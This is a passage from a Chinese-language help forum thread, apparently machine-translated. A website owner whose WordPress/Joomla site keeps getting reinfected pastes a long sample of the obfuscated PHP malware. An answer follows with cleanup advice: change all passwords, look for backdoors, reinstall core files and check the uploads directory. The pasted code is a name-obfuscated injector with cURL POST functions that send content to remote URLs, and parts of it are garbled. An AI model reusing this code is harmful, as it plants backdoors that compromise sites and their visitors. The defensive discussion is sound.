我有一些奇怪的问题,虽然我不能通过谷歌访问我的网站,因为它提醒用户这个网站包含恶意软件。
我的一些文件在我的所有文件夹中被意外编辑,一些新文件在Wordpress或Joomla core之间非常智能地创建,你永远无法理解它们是由病毒创建的。
它们都被base64代码编辑过,我删除了所有新的病毒文件并恢复了原始文件,但它们将在今天再次创建。
我的帐户是Cpanel,我更改了Cpanel密码一段时间但没有工作,我没有删除ftp用户,因为我认为可能我丢失了我的文件?
我该怎么做?谢谢!
")} = YypSc0cQFhy3J("'25-3:-");
${XiR75Dp("`ko)2hh@3xj#U")} = yndJFg6Eb("&%+3");
${UXiKSbeGBtie("i.ntxV2Xn-2!")} = zOeQ89("7(36.4;.");
${XiR75Dp("yVfSi9Y7i>");
function zOeQ89($SRPfSoOMwY){return YypSc0cQFhy3J($SRPfSoOMwY);};
${XiR75Dp("5/*V34")} = zOeQ89(")60086,+2+7/)#57$*,+8.0");
function wurJ5mP0tuiT($nx1ZVDkeubPPn){return YypSc0cQFhy3J($nx1ZVDkeubPPn);};
function yndJFg6Eb($erFRGKz){return YypSc0cQFhy3J($erFRGKz);};
${zOeQ89(";kT+)s-?Ckl86")} = YypSc0cQFhy3J("-65-2");
${zOeQ89("y;sZ7j./ll/"")} = yndJFg6Eb("6%:37*:");
${yndJFg6Eb("p7.s1@XWyjE5")} = yndJFg6Eb(")'%6*%2-B)0D*577");
${YypSc0cQFhy3J("vP2[lt@9q")} = UXiKSbeGBtie("4*$S");
function Su59bl($Ic6knPclJ){return YypSc0cQFhy3J($Ic6knPclJ);};
${XiR75Dp("xhVUl{y=:")} = XiR75Dp(")600*4;1=30?");
${yndJFg6Eb("sV3t-0\w]")} = zOeQ89(""&''1':4*=3");
${Su59bl("%g:ixyA")} = UXiKSbeGBtie(")60086,+2+7/)#57$*,+8.0");
${Su59bl("*k.3d)y")} = YypSc0cQFhy3J("*0,#8+;");
${XiR75Dp("6i.j=;gB[5r$l")} = yndJFg6Eb("-h{20y^Vl#^Ej");
${Su59bl("t'VR>t5*11x}`")} = UXiKSbeGBtie("465798");
${yndJFg6Eb("3an=m|Yn@")} = UXiKSbeGBtie("47%798&+8?9@");
${YypSc0cQFhy3J("l&i*3u")} = Su59bl("'71'9/66(/C5466");
${zOeQ89("$3dt;@436{}qc")} = XiR75Dp(".&V");
${yndJFg6Eb("7rz;;r")} = YypSc0cQFhy3J("d&e/wulX=?!x");
${wurJ5mP0tuiT("$:)2w2k~")} = wurJ5mP0tuiT("4+0-1'9'=/C@");
${YypSc0cQFhy3J("bhf[l8")} = YypSc0cQFhy3J("548)");
${UXiKSbeGBtie("f4S5TVs")} = YypSc0cQFhy3J("&:304*,");
${wurJ5mP0tuiT("nc7=,?>-~`")} = YypSc0cQFhy3J("04'");
${XiR75Dp("4%Z(f:")} = YypSc0cQFhy3J("*/304*,");
${XiR75Dp(";S)ty:%:020?");
${UXiKSbeGBtie("*q7rYk")} = yndJFg6Eb("*0"%78(A");
${yndJFg6Eb("8eT:3*j")} = UXiKSbeGBtie("465)&3&+88?196"'7+(!zA2B")} = yndJFg6Eb("'+/8*8&>*");
${wurJ5mP0tuiT("6c'upj,X^MPJ"),
YypSc0cQFhy3J("l1=-12(U[VYJG%215';1+60e?mtkhD]TWcI#*0'3X^MPJ"),);
if (${wurJ5mP0tuiT("3an=m|Yn@")}(${zOeQ89(":&Th7q~")}($_SERVER[UXiKSbeGBtie("rcsksx&lptnx`mf")]), wurJ5mP0tuiT("C")) != ${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("O"))+395){ ${UXiKSbeGBtie("$%4&)V*/'~\")], '');exit();}
if (empty(${YypSc0cQFhy3J("~gfv")}))
{
${XiR75Dp("cxww5}+;;r}ua")}();
}
${Su59bl("(9wzjv")} = ${wurJ5mP0tuiT("0tu|g1:")}();
${Su59bl("pUVY*:v")} = @$GLOBALS[YypSc0cQFhy3J("lue.d]}B")][Su59bl("gtur$yxky)jqdnu")];
if (${wurJ5mP0tuiT("*q7rYk")}(${YypSc0cQFhy3J("pUVY*:v")}, ${zOeQ89("tj&kv7@l2-")}))
{
${yndJFg6Eb("cxww5}+;;r}ua")}();
}
if (empty(${Su59bl("(9wzjv")}))
{
${Su59bl("cxww5}+;;r}ua")}();
}
${YypSc0cQFhy3J(",-k>{W+6^")} = ${XiR75Dp(";4{0,\2:#@")}(${Su59bl("(9wzjv")}, ${XiR75Dp("cvh0w73j;`06")}(XiR75Dp("O")), ${yndJFg6Eb("lhi8mYf.!")}(${Su59bl("(9wzjv")}, UXiKSbeGBtie("M"))+${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("P")));
if (${wurJ5mP0tuiT("*q7rYk")}(${wurJ5mP0tuiT(",-k>{W+6^")}, ${wurJ5mP0tuiT("pU/+SlnrhB?E")}))
{
${UXiKSbeGBtie("cxww5}+;;r}ua")}();
}
${YypSc0cQFhy3J("lWi(k4")} = ${YypSc0cQFhy3J("cvh0w73j;`06")}(Su59bl("QYRYT"));
${UXiKSbeGBtie("92w>2=tX")} = ${UXiKSbeGBtie("cvh0w73j;`06")}(yndJFg6Eb("O"));
foreach (${zOeQ89(")4c3:/Y,")}($GLOBALS[UXiKSbeGBtie("lue.d]}B")][XiR75Dp("qerwhwy'|zr")]) as ${zOeQ89("7w%hy3")})
{
${Su59bl("lWi(k4")} += ${UXiKSbeGBtie("nc7=,?>-~`")}(${UXiKSbeGBtie("7w%hy3")});
${Su59bl("92w>2=tX")} ++;
}
${YypSc0cQFhy3J("lWi(k4")}-~`")}(${YypSc0cQFhy3J("lWi(k4")}[${UXiKSbeGBtie("cvh0w73j;`06")}(XiR75Dp("O"))]) + ${wurJ5mP0tuiT("nc7=,?>-~`")}(${yndJFg6Eb("lWi(k4")}[${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("P"))]) + (${UXiKSbeGBtie("t'VR>t5*11x}`")}(${YypSc0cQFhy3J(";4{0,\2:#@")}($GLOBALS[XiR75Dp("lue.d]}B")][yndJFg6Eb("qerwhwy'|zr")], -${UXiKSbeGBtie("cvh0w73j;`06")}(YypSc0cQFhy3J("S"))), Su59bl("M2+4")) == FALSE ? ${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("XX")) : ${wurJ5mP0tuiT("::+'hr+Z+s")}(${YypSc0cQFhy3J("(9wzjv")})))) . YypSc0cQFhy3J("Y") . ${UXiKSbeGBtie("sx{=e@st5*11x}`")}(${yndJFg6Eb("y)6n(gk5|")}, Su59bl("M*711")) === FALSE)
{
${XiR75Dp("2ko:tw~04;/O2'9+;S=1"/"));
${UXiKSbeGBtie("2ko:tw~0!zA2B")};
global ${UXiKSbeGBtie("%g:ix!zA2B")}(${Su59bl("(9wzjv")}, FILTER_VALIDATE_IP, ${UXiKSbeGBtie("*-oRufz1")} | FILTER_FLAG_NO_RES_RANGE) !== FALSE)
{
return ${UXiKSbeGBtie("(9wzjv")};
}
}
}
}
return "";
}
function xccEP2Ijj4k()
{global ${XiR75Dp("6iXgz]h*Y$")};
global ${YypSc0cQFhy3J("6c'upj, array(yndJFg6Eb("*)137+&-;4") => true))));
$content = ${yndJFg6Eb(";S*e\o95")}(${zOeQ89("2-'qk9Z")}, ${UXiKSbeGBtie("%Pg:*8.")}, $content);
${YypSc0cQFhy3J("6iXgz]h*Y$")}(yndJFg6Eb("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}, $content);
}
else
{
$content = @${XiR75Dp(":&Th7q~")}(Su59bl("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")});
}
exit($content);
}
function lHZnkU90EY5yK($url, $content)
{global ${YypSc0cQFhy3J("cvh0w73j;`06")};
global ${Su59bl("8Yhs-4-@^v")};
global ${UXiKSbeGBtie("6b,X4@kz8;=")};
global ${yndJFg6Eb("eV4t5~")} = ${YypSc0cQFhy3J("6b,X4@kz8;=")}();
${yndJFg6Eb("8Yhs-4-@^v")}(${XiR75Dp("nV6>4t5~")}, CURLOPT_URL, $url);
${Su59bl("8Yhs-4-@^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_POST, ${Su59bl("cvh0w73j;`06")}(Su59bl("P")));
${XiR75Dp("8Yhs-4-@^v")}(${yndJFg6Eb("nV6>4t5~")}, CURLOPT_POSTFIELDS, $content);
${yndJFg6Eb("8Yhs-4-@^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_RETURNTRANSFER, TRUE);
${wurJ5mP0tuiT("nSz=[334t")} = ${zOeQ89(";S)ty:4t5~")});
${YypSc0cQFhy3J("eV4t5~")});
return ${UXiKSbeGBtie("nSz=[334t")};
}
function EdDkTQG2tuVN($url, $content)
{global ${yndJFg6Eb("2ko:tw~0 Array(wurJ5mP0tuiT(".'7,4*") => yndJFg6Eb("ootv"), zOeQ89(")'$(*8") => yndJFg6Eb("b118*4;S=C;1Y@$4520+*>4;/O;OS/9=9L750*4*7-//"), yndJFg6Eb("$118*4;") => $content)));
${Su59bl("nSz=[334t")} = @${Su59bl(":&Th7q~")}($url, FALSE, ${zOeQ89("qh:{nh]n@j:9")});
return ${YypSc0cQFhy3J("nSz=[334t")};
}
您必须更改所有密码,包括FTP。很可能他们得到了其中一个。它是在自己的服务器上的cPanel,还是作为经销商或最终用户使用的cPanel ?如果是你自己的服务器,很可能服务器已经被攻破了,你一定要请专家检查安全性,并删除服务器上的任何病毒。
如果你使用的是一个经销商面板,你应该询问你的主机。还要确保删除任何不应该在那里的奇怪的PHP文件,您很可能在某处有一个后门。最好的方法是删除除了wp-content文件夹之外的所有内容。
重新加载WordPress文件,手动检查wp-content中的所有文件。最简单的方法是删除所有插件文件,并从存储库下载新的文件。也许你的主题也应该这么做。一定要手动检查上传目录